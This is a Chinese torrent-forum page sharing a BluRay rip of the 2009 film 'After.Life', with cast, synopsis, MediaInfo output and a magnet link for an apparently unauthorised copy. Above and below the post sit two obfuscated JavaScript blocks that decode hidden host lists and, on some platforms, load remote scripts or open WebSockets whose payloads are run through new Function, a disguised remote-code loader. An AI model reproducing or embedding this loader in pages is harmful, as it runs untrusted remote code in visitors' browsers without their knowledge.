身后事[中文字幕].After.Life.2009.1080p.BluRay.DTS.x265-10bit 8.21GB

版主小s 1月前 285

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 身后事 / 灵异生死线 / 来世 / 生命之旅

◎片 名 After.Life

◎年 代 2009

◎产 地 美国

◎类 别 剧情 / 悬疑 / 惊悚

◎语 言 英语

◎上映日期 2009-11-07(美国)

◎IMDb链接 https://www.imdb.com/title/tt0838247/

◎豆瓣评分 6.8/10 (16867人评价)

◎豆瓣链接 https://movie.douban.com/subject/1986567/

◎片 长 104分钟

◎导 演 阿格尼兹卡·沃特维兹-沃斯洛 Agnieszka Wojtowicz-Vosloo (id:1302651)

◎编 剧 阿格尼兹卡·沃特维兹-沃斯洛 Agnieszka Wojtowicz-Vosloo (id:1302651)

◎演 员 连姆·尼森 Liam Neeson (id:1031220)

克里斯蒂娜·里奇 Christina Ricci (id:1035653)

贾斯汀·朗 Justin Long (id:1017904)

乔西·查尔斯 Josh Charles (id:1049551)

钱德勒·坎特布瑞 Chandler Canterbury (id:1036645)

杰克·罗韦洛 Jack Rovello (id:1302832)

芭芭拉·辛格 Barbara Singer (id:1459796)

保罗·海斯林格 Paul Haslinger (id:1037358)

Niven Howie Niven Howie (id:1287023)

Matthew Lessall Matthew Lessall (id:1302879)

Robin Day Robin Day (id:1281957)

Angel De Angelis Angel De Angelis (id:1281969)

Niven Howie Niven Howie (id:1287023)

◎标 签 悬疑 / 惊悚 / 美国 / 恐怖 / 美国电影 / 心理 / 恐怖电影 / 人性

◎简 介

安娜(克里斯蒂娜?里奇 Christina Ricci 饰)是一次车祸的幸存者,然而她惊讶的发现自己已经被判定了死亡。证据是她的葬礼已经在准备中,负责人正是葬礼主管艾略特(连姆?尼森 Liam Neeson 饰)。安娜对此既不解又恐惧。因为她很清楚,葬礼的终点就是入棺活埋。她对艾略特现身,希望后者坚持自己还活着的真相。两个人在封闭的停尸间进行着辩论,艾略特坚持履行自己的职责,并对安娜解释她到“来世”的种种缘由。而安娜面对不见底的黑暗,内心无比悲凉。然而,艾略特并不认同安娜的说法。他坚持自己是因为通灵才能辨识安娜的游魂。只有一个人还坚信安娜活着,那就是她的男友保罗(贾斯汀?朗 Justin Long 饰)。他并不认同艾略特的说法,坚持调查安娜的死因,慢慢地,他接近了真相……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 271070647825557771989974944194626993111 (0xCBEE4EC9F5D2EACB946298923AC63BD7)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.21 GiB

  8. Duration : 1 h 42 min

  9. Overall bit rate : 11.4 Mb/s

  10. Movie name : After Life 2009 1080p BluRay DTS [email protected]

  11. Encoded date : UTC 2021-10-17 12:47:30

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 42 min

  21. Bit rate : 9 883 kb/s

  22. Width : 1 920 pixels

  23. Height : 796 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.269

  31. Stream size : 7.10 GiB (87%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 42 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 1.08 GiB (13%)

  51. Title : English

  52. Language : English

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 1 h 36 min

  62. Bit rate : 21.5 kb/s

  63. Count of elements : 1318

  64. Stream size : 14.9 MiB (0%)

  65. Title : CHS

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No


  69. Text #2

  70. ID : 4

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 36 min

  76. Bit rate : 21.9 kb/s

  77. Count of elements : 1318

  78. Stream size : 15.2 MiB (0%)

  79. Title : CHT

  80. Language : Chinese

  81. Default : No

  82. Forced : No


  83. Menu

  84. 00:00:00.000 : en:Chapter 01

  85. 00:10:44.667 : en:Chapter 02

  86. 00:20:01.208 : en:Chapter 03

  87. 00:32:48.917 : en:Chapter 04

  88. 00:42:06.375 : en:Chapter 05

  89. 00:49:07.083 : en:Chapter 06

  90. 00:57:57.917 : en:Chapter 07

  91. 01:06:01.500 : en:Chapter 08

  92. 01:14:47.917 : en:Chapter 09

  93. 01:22:41.958 : en:Chapter 10

  94. 01:30:50.333 : en:Chapter 11

  95. 01:37:18.583 : en:Chapter 12




复制代码


TAGS 剧情 惊悚 悬疑

磁力链:
  • magnet:?xt=urn:btih:342FAC7ADEF014D24E092881F10DE33EC1581B10

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};